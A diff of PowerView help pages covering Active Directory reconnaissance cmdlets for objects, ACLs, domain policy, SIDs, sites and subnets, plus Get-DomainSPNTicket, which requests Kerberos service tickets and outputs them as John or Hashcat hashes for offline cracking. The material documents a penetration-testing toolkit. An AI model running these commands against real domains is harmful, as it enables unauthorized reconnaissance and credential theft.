SYNOPSIS +Return all (or specified) domain objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName + +## SYNTAX + +``` +Get-DomainObject [[-Identity] ] [-Domain ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] [-Credential ] + [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainObject -Domain testlab.local +``` + +Return all objects for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname +``` + +distinguishedname +----------------- +CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local +CN=dfm,CN=Users,DC=testlab,DC=local +OU=OU3,DC=testlab,DC=local +CN=dfm (admin),CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObject -Credential $Cred -Identity 'windows1' + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] Extracted domain 'testlab.local' from 'testlab\harmj0y' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) + +distinguishedname +----------------- +CN=harmj0y,CN=Users,DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins))) +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ADObject + +Custom PSObject with translated AD object property fields. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainObjectAcl.md b/docs/Recon/Get-DomainObjectAcl.md new file mode 100755 index 00000000..97f70cd0 --- /dev/null +++ b/docs/Recon/Get-DomainObjectAcl.md @@ -0,0 +1,251 @@ +# Get-DomainObjectAcl + +## SYNOPSIS +Returns the ACLs associated with a specific active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap + +## SYNTAX + +``` +Get-DomainObjectAcl [[-Identity] ] [-ResolveGUIDs] [-RightsFilter ] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs +``` + +Get the ACLs for the matt.admin user in the testlab.local domain and +resolve relevant GUIDs to their display names. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs +``` + +Enumerate the ACL permissions for all OUs in the domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveGUIDs +Switch. +Resolve GUIDs to their display names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsFilter +A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Rights + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ACL + +Custom PSObject with ACL entries. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainPolicy.md b/docs/Recon/Get-DomainPolicy.md new file mode 100755 index 00000000..8b7d1579 --- /dev/null +++ b/docs/Recon/Get-DomainPolicy.md @@ -0,0 +1,159 @@ +# Get-DomainPolicy + +## SYNOPSIS +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID + +## SYNTAX + +``` +Get-DomainPolicy [[-Domain] ] [-Source ] [-Server ] [-ServerTimeLimit ] + [-ResolveSids] [-Credential ] +``` + +## DESCRIPTION +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller using Get-DomainGPO. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainPolicy +``` + +Returns the domain policy for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainPolicy -Domain dev.testlab.local +``` + +Returns the domain policy for the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainPolicy -Source DC -Domain dev.testlab.local +``` + +Returns the policy for the dev.testlab.local domain controller. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainPolicy -Credential $Cred + +## PARAMETERS + +### -Domain +The domain to query for default policies, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Source +Extract 'Domain' or 'DC' (domain controller) policies. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Domain +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResolveSids +Switch. +Resolve Sids from a DC policy to object names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSID.md b/docs/Recon/Get-DomainSID.md new file mode 100755 index 00000000..16c51ceb --- /dev/null +++ b/docs/Recon/Get-DomainSID.md @@ -0,0 +1,102 @@ +# Get-DomainSID + +## SYNOPSIS +Returns the SID for the current domain or the specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer + +## SYNTAX + +``` +Get-DomainSID [[-Domain] ] [[-Server] ] [[-Credential] ] +``` + +## DESCRIPTION +Returns the SID for the current domain or the specified domain by executing +Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) +to search for domain controllers through LDAP. +The SID of the returned domain controller +is then extracted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSID +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSID -Domain testlab.local +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSID -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +A string representing the specified domain SID. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSPNTicket.md b/docs/Recon/Get-DomainSPNTicket.md new file mode 100755 index 00000000..70385a45 --- /dev/null +++ b/docs/Recon/Get-DomainSPNTicket.md @@ -0,0 +1,136 @@ +# Get-DomainSPNTicket + +## SYNOPSIS +Request the kerberos ticket for a specified service principal name (SPN). + +Author: machosec, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +### RawSPN (Default) +``` +Get-DomainSPNTicket [-SPN] [-OutputFormat ] [-Credential ] +``` + +### User +``` +Get-DomainSPNTicket [-User] [-OutputFormat ] [-Credential ] +``` + +## DESCRIPTION +This function will either take one/more SPN strings, or one/more PowerView.User objects +(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN +using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. +The encrypted +portion of the ticket is then extracted and output in either crackable John or Hashcat +format (deafult of John). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSPNTicket -SPN "HTTP/web.testlab.local" +``` + +Request a kerberos service ticket for the specified SPN. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket +``` + +Request kerberos service tickets for all SPNs passed on the pipeline. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat +``` + +Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format. + +## PARAMETERS + +### -SPN +Specifies the service principal name to request the ticket for. + +```yaml +Type: String[] +Parameter Sets: RawSPN +Aliases: ServicePrincipalName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -User +Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for. + +```yaml +Type: Object[] +Parameter Sets: User +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -OutputFormat +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Format + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote domain using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more SPN strings on the pipeline with the RawSPN parameter set. + +### PowerView.User + +Accepts one or more PowerView.User objects on the pipeline with the User parameter set. + +## OUTPUTS + +### PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSite.md b/docs/Recon/Get-DomainSite.md new file mode 100755 index 00000000..caf77903 --- /dev/null +++ b/docs/Recon/Get-DomainSite.md @@ -0,0 +1,309 @@ +# Get-DomainSite + +## SYNOPSIS +Search for all sites or specific site objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainSite [[-Identity] ] [-GPLink ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all site objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSite +``` + +Returns the current sites in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSite *admin* -Domain testlab.local +``` + +Returns all sites with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all sites with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSite -Credential $Cred + +## PARAMETERS + +### -Identity +An site name (e.g. +Test-Site), DistinguishedName (e.g. +CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or +GUID (e.g. +c37726ef-2b64-4524-b85b-6a9700c234dd). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GPLink +Only return sites with the specified GUID in their gplink property. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GUID + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Site + +Custom PSObject with translated site property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSubnet.md b/docs/Recon/Get-DomainSubnet.md new file mode 100755 index 00000000..8cd82b1a --- /dev/null +++ b/docs/Recon/Get-DomainSubnet.md @@ -0,0 +1,309 @@ +# Get-DomainSubnet + +## SYNOPSIS +Search for all subnets or specific subnets objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainSubnet [[-Identity] ] [-SiteName ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all subnet objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSubnet +``` + +Returns the current subnets in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSubnet *admin* -Domain testlab.local +``` + +Returns all subnets with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all subnets with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSubnet -Credential $Cred + +## PARAMETERS + +### -Identity +An subnet name (e.g. +'192.168.50.0/24'), DistinguishedName (e.g. +'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'), +or GUID (e.g. +c37726ef-2b64-4524-b85b-6a9700c234dd). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SiteName +Only return subnets from the specified SiteName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter 